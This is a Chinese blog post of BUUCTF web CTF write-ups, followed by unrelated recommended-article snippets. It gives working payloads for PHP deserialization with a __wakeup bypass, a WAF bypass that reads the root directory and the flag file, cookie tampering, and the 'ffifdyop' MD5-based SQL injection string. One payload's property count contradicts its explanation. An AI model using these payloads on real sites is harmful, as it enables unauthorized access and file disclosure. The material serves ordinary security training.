BUUCTF(刷题日记4)

最新推荐文章于 2024-07-19 17:34:15 发布
最新推荐文章于 2024-07-19 17:34:15 发布
阅读量104 收藏
点赞数
文章标签: 网络安全 sql php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74022830/article/details/130114489
版权

BUUCTF

文章目录

一、[极客大挑战 2019]PHP

在这里插入图片描述说明有备份文件kali扫一下
在这里插入图片描述
保存下来
在这里插入图片描述

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

反序列化意思是使password=100并且username=‘admin’写一个脚本

<?php
class Name{
    private $name = 'ding';
    private $pass = 'zhen';
    }
 
    echo serialize(new Name());
?>

O:4:“Name”:2:{s:14:“Nameusername”;s:5:“admin”;s:14:“Namepassword”;i:100;}
因为我们这里属于类中的私有数据需要在变量名前加%00而且需要绕过wakeup()魔法函数改变一下数据的个数就可以了,把2改成3
完整的payload:

/?select=O:4:"Name":12:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

拿到flag
在这里插入图片描述

二、[ACTF2020 新生赛]BackupFile

文件扫描
在这里插入图片描述
访问自动下载
得到一个PHP代码

<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}

因为是弱=所以说我们可以直接使key=123就可以了
在这里插入图片描述

三、[RoarCTF 2019]Easy Calc

在这里插入图片描述看看源码
在这里插入图片描述
有一个WAFbug
往下看还有一个calc.php文件
在这里插入图片描述过滤了这么多符号
WAF是一种web应用程序防护系统
对于waf不允许num传递字母,我们可以再num前面加空格来绕过,这样的话waf就找不到我们上传的num,因为现在的num的名字为“ num”,但是在php解析的时候,php会将空格去掉,这样去掉空格后代码还是正常的
了解几个PHP的函数

1、scandir() 函数返回指定目录中的文件和目录的数组  //相当于cat目录了
2、file_get_contents() 把整个文件读入一个字符串中
3、var_dump() 函数用于输出变量的相关信息

构造payload

calc.php? num=var_dump(scandir(char(47)))

在这里插入图片描述
在这里插入图片描述
使用file_get_contents()

? num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))

在这里插入图片描述

四、[极客大挑战 2019]BuyFlag

在这里插入图片描述如果你想要买这个flag:你必须是来自CUIT的学生;你必须输入正确的密码
看看源码
在这里插入图片描述
password=404a

# 总结只能来自CUIT
把user改为1试试
在这里插入图片描述叫买这个flag
在这里插入图片描述直接写一个money=100000000
在这里插入图片描述太长了用科学计数法money=1e100
在这里插入图片描述

五、[BJDCTF2020]Easy MD5

在这里插入图片描述MD5加密
ffifdyop,这个点的原理是 ffifdyop 这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9ed621c,这个字符串前几位刚好是 ‘ or ‘6,而 Mysql 刚好又会吧 hex 转成 ascii 解释
ffifdyop,该字符串md5加密后若raw参数为True时会返回 'or’6相当于万能密码了
在这里插入图片描述
还有一个比较简单的md5绕过payload:

a[]=1&b[]=2

在这里插入图片描述差不多

param1[]=1&param2[]=2

在这里插入图片描述

yzhikk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
8月7日CTF反序列化训练
slc3315的博客
08-08 1613
题目一 题目: 思路: 根据题目提示,存在备份文件,使用御剑或者disteach进行查找,找到www.zip,下载源码进行源码分析,然后构造对应反序列化参数即可 步骤一 源码分析: class Name{ public $username; public $password; function __wakeup(){ $this->username = 'guest'; } function __destruct(){ if
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
BUUCTF部分web题目
05-06
写题记录
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8340
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
PostgreSQL 中如何解决因大量并发删除和插入操作导致的索引抖动?
技术笔记
07-17 838
索引抖动是 PostgreSQL 中一个常见的问题,它会对数据库的性能产生严重的影响。通过采用批量操作、分区表、索引优化和调整数据库参数等方法,我们可以有效地解决索引抖动问题,提高数据库的性能和稳定性。在实际应用中,我们应该根据具体情况选择合适的解决方案,并不断地进行优化和调整,以满足业务的需求。解决索引抖动问题就像是一场战斗,我们需要根据敌人(问题)的特点和弱点,选择合适的武器(解决方案),并灵活运用战术(优化方法),才能取得最终的胜利。
接口开发:Orcal数据库的批量新增sql
qq_65032048的博客
07-17 764
场景:在日常的CURD中一定会用到批量新增。在我们的项目中,使用的数据库是Orcal,由于之前基本都是使用Mysql的,使用的sql语句也基本都是用mysql的。但是在这次的接口编写时用mysql的批量新增出了问题,刚开始我还以为是写的动态sql有问题,在后续的问题修改也主要是对动态sql修改,因此也浪费了大量的时间,在后续把sql搬到数据库运行一下后才发现是sql的问题,同时也了解到了mysql和orcal 也是有很多地方是不同的。
SQL Server设置定时作业调度Schedule
Cachel Wood的博客
07-15 398
在“步骤”选项卡中,单击“新建”按钮,然后输入步骤的名称和描述。在“计划”选项卡中,单击“新建”按钮来创建一个新的计划。代理将在指定的时间和频率下运行作业,并执行您定义的。右键单击“作业”文件夹,然后选择“新建作业”。在“作业属性”对话框中,输入作业的名称和描述。代理的功能,可以用来设置定时作业。在“命令”文本框中,输入要定期执行的。现在,您已经成功设置了一个定时作业。连接到要设置定时作业的数据库实例。设置每天早上八点执行这个定时任务。在对象资源管理器中,展开“
SQL执行流程、SQL执行计划、SQL优化
最新发布
风中的默默
07-19 199
返回两个表中的匹配行。返回左表中的所有记录以及右表中的匹配记录。返回右表中的所有记录以及左表中的匹配记录。返回左侧或右侧表中有匹配的所有记录。
SQL每日一题:查找重复的电子邮箱
xiongxiaoxuan的博客
07-17 349
编写解决方案来报告所有重复的电子邮件。请注意,可以保证电子邮件字段不为 NULL。以 任意顺序 返回结果表。按照email分组计数,筛选出数量>1的email。(需注意分组计数时一定要记得用group by)此表的每一行都包含一封电子邮件。电子邮件不包含大写字母。id 是该表的主键(具有唯一值的列)。
SQL Server详细使用教程(包含启动SQL server服务、建立数据库、建表的详细操作) 非常适合初学者
hackeroink的博客
07-15 1097
本文主要详细介绍SQL server2019的简单使用,以《数据库系统概论(第5版)》的第79页—第80页为例,详细介绍如何使用SQL server2019这款数据库软件,包括启动SQL server服务,建立数据库(学生—课程模式S-T),建立课程表等,内容比较简单,容易理解,适合广大初学者了解SQL server的简单使用。不会涉及到复杂的语法知识,如果有也会详细解释的!下文标红的字请重点关注一下!本文的需要建表的数据如下:2.Course课程号Cno课程名Cname先行课Cpno学分。
NoSql选择题解
2301_79659699的博客
07-16 635
5. (单选题, 3分)MongoDB是一种NoSQL数据库,具体地说,是( )存储数据库。13. (单选题, 3分)CAP理论是NoSQL理论的基础,下列性质不属于CAP的是( )。7. (单选题, 3分)CAP理论是NoSQL理论的基础,下列性质不属于CAP的是( )。11. (单选题, 3分)下列关于NoSQL数据库和关系型数据库的比较,不正确的是( )。8. (单选题, 3分)于NoSQL数据库和关系数据库,下列说法不正确的是( )。6. (单选题, 3分)NoSQL数据库是指( )数据存储系统。
PostgreSQL 中如何解决因大量并发插入导致的主键冲突?
技术笔记
07-16 984
在 PostgreSQL 中,解决因大量并发插入导致的主键冲突问题是一个重要的任务。我们可以通过使用唯一索引、序列、批量插入与事务处理、分区表和优化业务逻辑等方法来避免主键冲突的发生。这些方法各有优缺点,我们需要根据实际情况选择合适的解决方案。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf📙PostgreSQL 中文手册📘PostgreSQL 技术专栏🍅CSDN社区-墨松科技。
怎样在 PostgreSQL 中实现数据的异地备份?
技术笔记
07-19 876
总而言之,在 PostgreSQL 中实现数据的异地备份不是一件难事,但也需要我们认真对待,精心规划。选择合适的备份方法和异地存储方式,制定合理的备份策略,定期进行测试和恢复演练,才能确保我们的数据在任何情况下都能“安然无恙”。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf📙PostgreSQL 中文手册📘PostgreSQL 技术专栏🍅CSDN社区-墨松科技。
PostgreSQL的学习心得和知识总结(一百四十八)|查看 PostgreSQL 17 中的新内置排序规则提供程序
孤傲小二~阿沐的博客
07-15 759
查看 PostgreSQL 17 中的新内置排序规则提供程序
【PostgreSQL】Windows 上安装 PostgreSQL 16版本
No8g攻城狮的博客
07-17 1046
✌全网粉丝20W+,CSDN博客专家、Java领域优质创作者,掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域✌。
sql server 设置端口
嫦娥妹妹等等我的博客
07-16 320
SQL Server 中设置端口号可以通过 SQL Server Configuration Manager 完成。完成上述步骤后,你的 SQL Server 实例将使用你设置的端口号。确保在客户端连接时使用相应的端口号来连接 SQL Server。
buuctf web
08-15
- *2* [【BUUCTF刷题】Web解题方法总结(一)](https://blog.csdn.net/qq_45834505/article/details/114276572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值